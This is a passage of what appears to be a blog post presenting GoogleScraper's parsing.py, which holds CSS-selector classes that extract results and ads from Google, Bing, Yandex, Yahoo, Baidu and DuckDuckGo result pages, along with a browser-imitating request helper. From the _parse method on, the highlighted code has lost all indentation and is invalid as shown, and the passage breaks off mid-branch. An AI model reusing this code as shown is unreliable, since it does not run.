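    return urllib.request.Request(url, headers={'User-Agent': user_agent})


def fetch_html(url):
    """Download the page; whether the returned HTML is usable depends on the engine."""
    request = build_browser_like_request(url)
    with urllib.request.urlopen(request, timeout=10) as response:
        return response.read()


request = build_browser_like_request('http://yandex.ru/yandsearch?text=GoogleScraper')
print(request.get_header('User-agent'))
```

<p>A single header is often not enough to get the same markup a real browser receives, which is why the full project goes further than this.</p>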
<p>Please note, the most recent version of the code can be found here:
<a href="https://github.com/NikolaiT/GoogleScraper/blob/master/GoogleScraper/parsing.py" title="parsing.py">parsing.py at
GoogleScraper</a></p>
<div class="highlight"><pre><span></span><code><span class="c1"># -*- coding: utf-8 -*-</span>
<span class="sd">"""</span>
<span class="sd">author: Nikolai Tschacher</span>
<span class="sd">date: 11.11.2014</span>
<span class="sd">home: incolumitas.com</span>
<span class="sd">"""</span>
<span class="c1"># TODO: Implement alternate selectors for different SERP formats (just use a list in the CSS selector datatypes)</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="kn">import</span> <span class="nn">lxml.html</span>
<span class="kn">import</span> <span class="nn">logging</span>
<span class="kn">import</span> <span class="nn">urllib</span>
<span class="kn">import</span> <span class="nn">pprint</span>
<span class="k">try</span><span class="p">:</span>
    <span class="kn">from</span> <span class="nn">cssselect</span> <span class="kn">import</span> <span class="n">HTMLTranslator</span><span class="p">,</span> <span class="n">SelectorError</span>
    <span class="kn">from</span> <span class="nn">bs4</span> <span class="kn">import</span> <span class="n">UnicodeDammit</span>
<span class="k">except</span> <span class="ne">ImportError</span> <span class="k">as</span> <span class="n">ie</span><span class="p">:</span>
    <span class="k">if</span> <span class="nb">hasattr</span><span class="p">(</span><span class="n">ie</span><span class="p">,</span> <span class="s1">'name'</span><span class="p">)</span> <span class="ow">and</span> <span class="n">ie</span><span class="o">.</span><span class="n">name</span> <span class="o">==</span> <span class="s1">'bs4'</span> <span class="ow">or</span> <span class="nb">hasattr</span><span class="p">(</span><span class="n">ie</span><span class="p">,</span> <span class="s1">'args'</span><span class="p">)</span> <span class="ow">and</span> <span class="s1">'bs4'</span> <span class="ow">in</span> <span class="nb">str</span><span class="p">(</span><span class="n">ie</span><span class="p">):</span>
        <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="s1">'Install bs4 with the command "sudo pip3 install beautifulsoup4"'</span><span class="p">)</span>

<span class="n">logger</span> <span class="o">=</span> <span class="n">logging</span><span class="o">.</span><span class="n">getLogger</span><span class="p">(</span><span class="s1">'GoogleScraper'</span><span class="p">)</span>

<span class="k">class</span> <span class="nc">InvalidSearchTypeExcpetion</span><span class="p">(</span><span class="ne">Exception</span><span class="p">):</span>
    <span class="k">pass</span>

<span class="k">class</span> <span class="nc">Parser</span><span class="p">():</span>
    <span class="sd">"""Parses SERP pages.</span>
<span class="sd">    Each search engine results page (SERP) has a similar layout:</span>
<span class="sd">    The main search results are usually in a html container element (#main, .results, #leftSide).</span>
<span class="sd">    There might be separate columns for other search results (like ads for example). Then each</span>
<span class="sd">    result contains basically a link, a snippet and a description (usually some text on the</span>
<span class="sd">    target site). It's really astonishing how similar other search engines are to Google.</span>
<span class="sd">    Each child class (that can actually parse a concrete search engine results page) needs</span>
<span class="sd">    to specify css selectors for the different search types (Like normal search, news search, video search, ...).</span>
<span class="sd">    Attributes:</span>
<span class="sd">        search_results: The results after parsing.</span>
<span class="sd">    """</span>
    <span class="c1"># The supported search types. For instance, Google supports Video Search, Image Search, News search</span>
    <span class="n">search_types</span> <span class="o">=</span> <span class="p">[]</span>

    <span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">html</span><span class="p">,</span> <span class="n">searchtype</span><span class="o">=</span><span class="s1">'normal'</span><span class="p">):</span>
        <span class="sd">"""Create new Parser instance and parse all information.</span>
<span class="sd">        Args:</span>
<span class="sd">            html: The raw html from the search engine search</span>
<span class="sd">            searchtype: The search type. By default "normal"</span>
<span class="sd">        Raises:</span>
<span class="sd">            Assertion error if the subclassed</span>
<span class="sd">            specific parser cannot handle the settings.</span>
<span class="sd">        """</span>
        <span class="k">assert</span> <span class="n">searchtype</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">search_types</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">html</span> <span class="o">=</span> <span class="n">html</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">searchtype</span> <span class="o">=</span> <span class="n">searchtype</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">dom</span> <span class="o">=</span> <span class="kc">None</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">search_results</span> <span class="o">=</span> <span class="p">{}</span>
        <span class="c1"># Try to parse the provided HTML string using lxml</span>
        <span class="n">doc</span> <span class="o">=</span> <span class="n">UnicodeDammit</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">html</span><span class="p">,</span> <span class="n">is_html</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
        <span class="n">parser</span> <span class="o">=</span> <span class="n">lxml</span><span class="o">.</span><span class="n">html</span><span class="o">.</span><span class="n">HTMLParser</span><span class="p">(</span><span class="n">encoding</span><span class="o">=</span><span class="n">doc</span><span class="o">.</span><span class="n">declared_html_encoding</span><span class="p">)</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">dom</span> <span class="o">=</span> <span class="n">lxml</span><span class="o">.</span><span class="n">html</span><span class="o">.</span><span class="n">document_fromstring</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">html</span><span class="p">,</span> <span class="n">parser</span><span class="o">=</span><span class="n">parser</span><span class="p">)</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">dom</span><span class="o">.</span><span class="n">resolve_base_href</span><span class="p">()</span>
        <span class="c1"># let's do the actual parsing</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">_parse</span><span class="p">()</span>
        <span class="c1"># Apply subclass specific behaviour after parsing has happened</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">after_parsing</span><span class="p">()</span>

<span class="k">def</span> <span class="nf">_parse</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="sd">"""Parse the dom according to the provided css selectors.</span>
<span class="sd"> Raises: InvalidSearchTypeExcpetion if no css selectors for the searchtype could be found.</span>
<span class="sd"> """</span>
<span class="c1"># try to parse the number of results.</span>
<span class="n">attr_name</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">searchtype</span> <span class="o">+</span> <span class="s1">'_search_selectors'</span>
<span class="n">selector_dict</span> <span class="o">=</span> <span class="nb">getattr</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">attr_name</span><span class="p">,</span> <span class="kc">None</span><span class="p">)</span>
<span class="c1"># short alias because we use it so extensively</span>
<span class="n">css_to_xpath</span> <span class="o">=</span> <span class="n">HTMLTranslator</span><span class="p">()</span><span class="o">.</span><span class="n">css_to_xpath</span>
<span class="c1"># get the appropriate css selectors for the num_results for the keyword</span>
<span class="n">num_results_selector</span> <span class="o">=</span> <span class="nb">getattr</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="s1">'num_results_search_selectors'</span><span class="p">,</span> <span class="kc">None</span><span class="p">)</span>
<span class="k">if</span> <span class="n">num_results_selector</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">search_results</span><span class="p">[</span><span class="s1">'num_results'</span><span class="p">]</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">dom</span><span class="o">.</span><span class="n">xpath</span><span class="p">(</span><span class="n">css_to_xpath</span><span class="p">(</span><span class="n">num_results_selector</span><span class="p">))[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">text_content</span><span class="p">()</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">selector_dict</span><span class="p">:</span>
<span class="k">raise</span> <span class="n">InvalidSearchTypeExcpetion</span><span class="p">(</span><span class="s1">'There is no such attribute: </span><span class="si">{}</span><span class="s1">. No selectors found'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">attr_name</span><span class="p">))</span>
<span class="k">for</span> <span class="n">result_type</span><span class="p">,</span> <span class="n">selectors</span> <span class="ow">in</span> <span class="n">selector_dict</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
<span class="bp">self</span><span class="o">.</span><span class="n">search_results</span><span class="p">[</span><span class="n">result_type</span><span class="p">]</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">results</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">dom</span><span class="o">.</span><span class="n">xpath</span><span class="p">(</span>
<span class="n">css_to_xpath</span><span class="p">(</span><span class="s1">'</span><span class="si">{container}</span><span class="s1"> </span><span class="si">{result_container}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="o">**</span><span class="n">selectors</span><span class="p">))</span>
<span class="p">)</span>
<span class="n">to_extract</span> <span class="o">=</span> <span class="nb">set</span><span class="p">(</span><span class="n">selectors</span><span class="o">.</span><span class="n">keys</span><span class="p">())</span> <span class="o">-</span> <span class="p">{</span><span class="s1">'container'</span><span class="p">,</span> <span class="s1">'result_container'</span><span class="p">}</span>
<span class="n">selectors_to_use</span> <span class="o">=</span> <span class="nb">dict</span><span class="p">(((</span><span class="n">key</span><span class="p">,</span> <span class="n">selectors</span><span class="p">[</span><span class="n">key</span><span class="p">])</span> <span class="k">for</span> <span class="n">key</span> <span class="ow">in</span> <span class="n">to_extract</span> <span class="k">if</span> <span class="n">key</span> <span class="ow">in</span> <span class="n">selectors</span><span class="o">.</span><span class="n">keys</span><span class="p">()))</span>
<span class="k">for</span> <span class="n">index</span><span class="p">,</span> <span class="n">result</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">results</span><span class="p">):</span>
<span class="c1"># Let's add primitve support for CSS3 pseudo selectors</span>
<span class="c1"># We just need two of them</span>
<span class="c1"># ::text</span>
<span class="c1"># ::attr(someattribute)</span>
<span class="c1"># You say we should use xpath expressions instead?</span>
<span class="c1"># Maybe you're right, but they are complicated when it comes to classes,</span>
<span class="c1"># have a look here: http://doc.scrapy.org/en/latest/topics/selectors.html</span>
<span class="n">serp_result</span> <span class="o">=</span> <span class="p">{}</span>
<span class="k">for</span> <span class="n">key</span><span class="p">,</span> <span class="n">selector</span> <span class="ow">in</span> <span class="n">selectors_to_use</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
<span class="n">value</span> <span class="o">=</span> <span class="kc">None</span>
<span class="k">if</span> <span class="n">selector</span><span class="o">.</span><span class="n">endswith</span><span class="p">(</span><span class="s1">'::text'</span><span class="p">):</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">value</span> <span class="o">=</span> <span class="n">result</span><span class="o">.</span><span class="n">xpath</span><span class="p">(</span><span class="n">css_to_xpath</span><span class="p">(</span><span class="n">selector</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">'::'</span><span class="p">)[</span><span class="mi">0</span><span class="p">]))[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">text_content</span><span class="p">()</span>
<span class="k">except</span> <span class="ne">IndexError</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="k">pass</span>
<span class="k">else</span><span class="p">:</span>
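<span class="c1"># re.search() returns None when the selector has no ::attr(...) suffix</span>
<span class="n">match</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'::attr\((?P&lt;attr&gt;.*)\)$'</span><span class="p">,</span> <span class="n">selector</span><span class="p">)</span>
<span class="n">attr</span> <span class="o">=</span> <span class="n">match</span><span class="o">.</span><span class="n">group</span><span class="p">(</span><span class="s1">'attr'</span><span class="p">)</span> <span class="k">if</span> <span class="n">match</span> <span class="k">else</span> <span class="kc">None</span>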
<span class="k">if</span> <span class="n">attr</span><span class="p">:</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">value</span> <span class="o">=</span> <span class="n">result</span><span class="o">.</span><span class="n">xpath</span><span class="p">(</span><span class="n">css_to_xpath</span><span class="p">(</span><span class="n">selector</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">'::'</span><span class="p">)[</span><span class="mi">0</span><span class="p">]))[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">attr</span><span class="p">)</span>
<span class="k">except</span> <span class="ne">IndexError</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="k">pass</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">value</span> <span class="o">=</span> <span class="n">result</span><span class="o">.</span><span class="n">xpath</span><span class="p">(</span><span class="n">css_to_xpath</span><span class="p">(</span><span class="n">selector</span><span class="p">))[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">text_content</span><span class="p">()</span>
<span class="k">except</span> <span class="ne">IndexError</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="k">pass</span>
<span class="n">serp_result</span><span class="p">[</span><span class="n">key</span><span class="p">]</span> <span class="o">=</span> <span class="n">value</span>
<span class="k">if</span> <span class="n">serp_result</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">search_results</span><span class="p">[</span><span class="n">result_type</span><span class="p">]</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">serp_result</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">after_parsing</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="sd">"""Subclass specific behaviour after parsing happened.</span>
<span class="sd"> Override in subclass to add search engine specific behaviour.</span>
<span class="sd"> Commonly used to clean the results.</span>
<span class="sd"> """</span>
<span class="k">def</span> <span class="fm">__str__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="sd">"""Return a nicely formatted overview of the results."""</span>
<span class="k">return</span> <span class="n">pprint</span><span class="o">.</span><span class="n">pformat</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">search_results</span><span class="p">)</span>
<span class="sd">"""</span>
<span class="sd">Here follow the different classes that provide CSS selectors </span>
<span class="sd">for different types of SERP pages of several common search engines.</span>
<span class="sd">Just look at them and add your own selectors in a new class if you</span>
<span class="sd">want the Scraper to support them.</span>
<span class="sd">You can easily just add new selectors to a search engine. Just follow</span>
<span class="sd">the attribute naming convention and the parser will recognize them:</span>
<span class="sd">If you provide a dict with a name like finance_search_selectors,</span>
<span class="sd">then you're adding a new search type with the name finance.</span>
<span class="sd">Each class needs an attribute called num_results_search_selectors, that</span>
<span class="sd">extracts the number of searches that were found by the keyword.</span>
<span class="sd">"""</span>
<span class="k">class</span> <span class="nc">GoogleParser</span><span class="p">(</span><span class="n">Parser</span><span class="p">):</span>
<span class="sd">"""Parses SERP pages of the Google search engine."""</span>
<span class="n">search_types</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'normal'</span><span class="p">,</span> <span class="s1">'image'</span><span class="p">]</span>
<span class="n">num_results_search_selectors</span> <span class="o">=</span> <span class="s1">'div#resultStats'</span>
<span class="n">normal_search_selectors</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'results'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'container'</span><span class="p">:</span> <span class="s1">'#center_col'</span><span class="p">,</span>
<span class="s1">'result_container'</span><span class="p">:</span> <span class="s1">'li.g '</span><span class="p">,</span>
<span class="s1">'link'</span><span class="p">:</span> <span class="s1">'h3.r > a:first-child::attr(href)'</span><span class="p">,</span>
<span class="s1">'snippet'</span><span class="p">:</span> <span class="s1">'div.s span.st::text'</span><span class="p">,</span>
<span class="s1">'title'</span><span class="p">:</span> <span class="s1">'h3.r > a:first-child::text'</span><span class="p">,</span>
<span class="s1">'visible_link'</span><span class="p">:</span> <span class="s1">'cite::text'</span>
<span class="p">},</span>
<span class="s1">'ads_main'</span> <span class="p">:</span> <span class="p">{</span>
<span class="s1">'container'</span><span class="p">:</span> <span class="s1">'#center_col'</span><span class="p">,</span>
<span class="s1">'result_container'</span><span class="p">:</span> <span class="s1">'li.ads-ad'</span><span class="p">,</span>
<span class="s1">'link'</span><span class="p">:</span> <span class="s1">'h3.r > a:first-child::attr(href)'</span><span class="p">,</span>
<span class="s1">'snippet'</span><span class="p">:</span> <span class="s1">'div.s span.st::text'</span><span class="p">,</span>
<span class="s1">'title'</span><span class="p">:</span> <span class="s1">'h3.r > a:first-child::text'</span><span class="p">,</span>
<span class="s1">'visible_link'</span><span class="p">:</span> <span class="s1">'.ads-visurl cite::text'</span><span class="p">,</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">image_search_selectors</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'results'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'container'</span><span class="p">:</span> <span class="s1">'li#isr_mc'</span><span class="p">,</span>
<span class="s1">'result_container'</span><span class="p">:</span> <span class="s1">'div.rg_di'</span><span class="p">,</span>
<span class="s1">'imgurl'</span><span class="p">:</span> <span class="s1">'a.rg_l::attr(href)'</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="o">*</span><span class="n">args</span><span class="p">,</span> <span class="o">**</span><span class="n">kwargs</span><span class="p">):</span>
<span class="nb">super</span><span class="p">()</span><span class="o">.</span><span class="fm">__init__</span><span class="p">(</span><span class="o">*</span><span class="n">args</span><span class="p">,</span> <span class="o">**</span><span class="n">kwargs</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">after_parsing</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="sd">"""Clean the urls.</span>
<span class="sd"> A typical scraped result looks like the following:</span>
<span class="sd"> '/url?q=http://www.youtube.com/user/Apple&sa=U&ei=lntiVN7JDsTfPZCMgKAO&ved=0CFQQFjAO&usg=AFQjCNGkX65O-hKLmyq1FX9HQqbb9iYn9A'</span>
<span class="sd"> Clean with a short regex.</span>
<span class="sd"> """</span>
<span class="nb">super</span><span class="p">()</span><span class="o">.</span><span class="n">after_parsing</span><span class="p">()</span>
<span class="k">for</span> <span class="n">key</span><span class="p">,</span> <span class="n">value</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">search_results</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
<span class="k">if</span> <span class="nb">isinstance</span><span class="p">(</span><span class="n">value</span><span class="p">,</span> <span class="nb">list</span><span class="p">):</span>
<span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">item</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">value</span><span class="p">):</span>
<span class="k">if</span> <span class="nb">isinstance</span><span class="p">(</span><span class="n">item</span><span class="p">,</span> <span class="nb">dict</span><span class="p">)</span> <span class="ow">and</span> <span class="n">item</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'link'</span><span class="p">):</span>
<span class="n">result</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'/url\?q=(?P&lt;url&gt;.*?)&sa=U&ei='</span><span class="p">,</span> <span class="n">item</span><span class="p">[</span><span class="s1">'link'</span><span class="p">])</span>
<span class="k">if</span> <span class="n">result</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">search_results</span><span class="p">[</span><span class="n">key</span><span class="p">][</span><span class="n">i</span><span class="p">][</span><span class="s1">'link'</span><span class="p">]</span> <span class="o">=</span> <span class="n">result</span><span class="o">.</span><span class="n">group</span><span class="p">(</span><span class="s1">'url'</span><span class="p">)</span>
<span class="k">class</span> <span class="nc">YandexParser</span><span class="p">(</span><span class="n">Parser</span><span class="p">):</span>
<span class="sd">"""Parses SERP pages of the Yandex search engine."""</span>
<span class="n">search_types</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'normal'</span><span class="p">]</span>
<span class="n">num_results_search_selectors</span> <span class="o">=</span> <span class="kc">None</span>
<span class="n">normal_search_selectors</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'results'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'container'</span><span class="p">:</span> <span class="s1">'div.serp-list'</span><span class="p">,</span>
<span class="s1">'result_container'</span><span class="p">:</span> <span class="s1">'div.serp-item__wrap '</span><span class="p">,</span>
<span class="s1">'link'</span><span class="p">:</span> <span class="s1">'a.serp-item__title-link::attr(href)'</span><span class="p">,</span>
<span class="s1">'snippet'</span><span class="p">:</span> <span class="s1">'div.serp-item__text::text'</span><span class="p">,</span>
<span class="s1">'title'</span><span class="p">:</span> <span class="s1">'a.serp-item__title-link::text'</span><span class="p">,</span>
<span class="s1">'visible_link'</span><span class="p">:</span> <span class="s1">'a.serp-url__link::attr(href)'</span>
<span class="p">},</span>
<span class="p">}</span>
<span class="k">class</span> <span class="nc">BingParser</span><span class="p">(</span><span class="n">Parser</span><span class="p">):</span>
<span class="sd">"""Parses SERP pages of the Bing search engine."""</span>
<span class="n">search_types</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'normal'</span><span class="p">]</span>
<span class="n">num_results_search_selectors</span> <span class="o">=</span> <span class="s1">'.sb_count'</span>
<span class="n">normal_search_selectors</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'results'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'container'</span><span class="p">:</span> <span class="s1">'ol#b_results'</span><span class="p">,</span>
<span class="s1">'result_container'</span><span class="p">:</span> <span class="s1">'li.b_algo'</span><span class="p">,</span>
<span class="s1">'link'</span><span class="p">:</span> <span class="s1">'.b_title > h2 > a::attr(href)'</span><span class="p">,</span>
<span class="s1">'snippet'</span><span class="p">:</span> <span class="s1">'.b_snippet > p::text'</span><span class="p">,</span>
<span class="s1">'title'</span><span class="p">:</span> <span class="s1">'.b_title > h2 > a::text'</span><span class="p">,</span>
<span class="s1">'visible_link'</span><span class="p">:</span> <span class="s1">'cite::text'</span>
<span class="p">},</span>
<span class="s1">'ads_main'</span> <span class="p">:</span> <span class="p">{</span>
<span class="s1">'container'</span><span class="p">:</span> <span class="s1">'ol#b_results'</span><span class="p">,</span>
<span class="s1">'result_container'</span><span class="p">:</span> <span class="s1">'li.b_ad'</span><span class="p">,</span>
<span class="s1">'link'</span><span class="p">:</span> <span class="s1">'.sb_add > h2 > a::attr(href)'</span><span class="p">,</span>
<span class="s1">'snippet'</span><span class="p">:</span> <span class="s1">'.b_caption::text'</span><span class="p">,</span>
<span class="s1">'title'</span><span class="p">:</span> <span class="s1">'.sb_add > h2 > a::text'</span><span class="p">,</span>
<span class="s1">'visible_link'</span><span class="p">:</span> <span class="s1">'cite::text'</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">class</span> <span class="nc">YahooParser</span><span class="p">(</span><span class="n">Parser</span><span class="p">):</span>
<span class="sd">"""Parses SERP pages of the Yahoo search engine."""</span>
<span class="n">search_types</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'normal'</span><span class="p">]</span>
<span class="n">num_results_search_selectors</span> <span class="o">=</span> <span class="s1">'#pg > span:last-child'</span>
<span class="n">normal_search_selectors</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'results'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'container'</span><span class="p">:</span> <span class="s1">'#main'</span><span class="p">,</span>
<span class="s1">'result_container'</span><span class="p">:</span> <span class="s1">'.res'</span><span class="p">,</span>
<span class="s1">'link'</span><span class="p">:</span> <span class="s1">'div > h3 > a::attr(href)'</span><span class="p">,</span>
<span class="s1">'snippet'</span><span class="p">:</span> <span class="s1">'div.abstr::text'</span><span class="p">,</span>
<span class="s1">'title'</span><span class="p">:</span> <span class="s1">'div > h3 > a::text'</span><span class="p">,</span>
<span class="s1">'visible_link'</span><span class="p">:</span> <span class="s1">'span.url::text'</span>
<span class="p">},</span>
<span class="p">}</span>
<span class="k">class</span> <span class="nc">BaiduParser</span><span class="p">(</span><span class="n">Parser</span><span class="p">):</span>
<span class="sd">"""Parses SERP pages of the Baidu search engine."""</span>
<span class="n">search_types</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'normal'</span><span class="p">]</span>
<span class="n">num_results_search_selectors</span> <span class="o">=</span> <span class="s1">'#container .nums'</span>
<span class="n">normal_search_selectors</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'results'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'container'</span><span class="p">:</span> <span class="s1">'#content_left'</span><span class="p">,</span>
<span class="s1">'result_container'</span><span class="p">:</span> <span class="s1">'.result-op'</span><span class="p">,</span>
<span class="s1">'link'</span><span class="p">:</span> <span class="s1">'h3 > a.t::attr(href)'</span><span class="p">,</span>
<span class="s1">'snippet'</span><span class="p">:</span> <span class="s1">'.c-abstract::text'</span><span class="p">,</span>
<span class="s1">'title'</span><span class="p">:</span> <span class="s1">'h3 > a.t::text'</span><span class="p">,</span>
<span class="s1">'visible_link'</span><span class="p">:</span> <span class="s1">'span.c-showurl::text'</span>
<span class="p">},</span>
<span class="p">}</span>
<span class="k">class</span> <span class="nc">DuckduckgoParser</span><span class="p">(</span><span class="n">Parser</span><span class="p">):</span>
<span class="sd">"""Parses SERP pages of the Duckduckgo search engine."""</span>
<span class="n">search_types</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'normal'</span><span class="p">]</span>
<span class="n">num_results_search_selectors</span> <span class="o">=</span> <span class="kc">None</span>
<span class="n">normal_search_selectors</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'results'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'container'</span><span class="p">:</span> <span class="s1">'#links'</span><span class="p">,</span>
<span class="s1">'result_container'</span><span class="p">:</span> <span class="s1">'.result'</span><span class="p">,</span>
<span class="s1">'link'</span><span class="p">:</span> <span class="s1">'.result__title > a::attr(href)'</span><span class="p">,</span>
<span class="s1">'snippet'</span><span class="p">:</span> <span class="s1">'.result__snippet::text'</span><span class="p">,</span>
<span class="s1">'title'</span><span class="p">:</span> <span class="s1">'.result__title > a::text'</span><span class="p">,</span>
<span class="s1">'visible_link'</span><span class="p">:</span> <span class="s1">'.result__url__domain::text'</span>
<span class="p">},</span>
<span class="p">}</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="sd">"""Originally part of https://github.com/NikolaiT/GoogleScraper.</span>
<span class="sd"> Only for testing purposes: May be called directly with a search engine </span>
<span class="sd"> search url. For example:</span>
<span class="sd"> python3 parsing.py 'http://yandex.ru/yandsearch?text=GoogleScraper&lr=178&csg=82%2C4317%2C20%2C20%2C0%2C0%2C0'</span>
<span class="sd"> Please note: Using this module directly makes little sense, because requesting such urls</span>
<span class="sd"> directly without imitating a real browser (which is done in my GoogleScraper module) makes</span>
<span class="sd"> the search engines return crippled html, which makes it impossible to parse.</span>
<span class="sd"> But for some engines it nevertheless works (for example: yandex, google, ...).</span>
<span class="sd"> """</span>
<span class="kn">import</span> <span class="nn">requests</span>
<span class="k">assert</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">==</span> <span class="mi">2</span><span class="p">,</span> <span class="s1">'Usage: </span><span class="si">{}</span><span class="s1"> url'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span>
<span class="n">url</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="n">raw_html</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">url</span><span class="p">)</span><span class="o">.</span><span class="n">text</span>
<span class="n">parser</span> <span class="o">=</span> <span class="kc">None</span>
<span class="k">if</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'^http[s]?://www\.google'</span><span class="p">,</span> <span class="n">url</span><span class="p">):</span>
<span class="n">parser</span> <span class="o">=</span> <span class="n">GoogleParser</span><span class="p">(</span><span class="n">raw_html</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'^http://yandex\.ru'</span><span class="p">,</span> <span class="n">url</span><span class="p">):</span>
<span class="n">parser</span> <span class="o">=</span> <span class="n">YandexParser</span><span class="p">(</span><span class="n">raw_html</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'^http://www\.bing\.'</span><span class="p">,</span> <span class="n">url</span><span class="p">):</span>
<span class="n">parser</span> <span class="o">=</span> <span class="n">BingParser</span><span class="p">(</span><span class="n">raw_html</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'^http[s]?://search\.yahoo.'</span><span class="p">,</span> <span class="n">url</span><span class="p">):</span>
<span class="n">parser</span> <span class="o">=</span> <span class="n">YahooParser</span><span class="p">(</span><span class="n">raw_html</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'^http://www\.baidu\.com'</span><span class="p">,</span> <span class="n">url</span><span class="p">):</span>
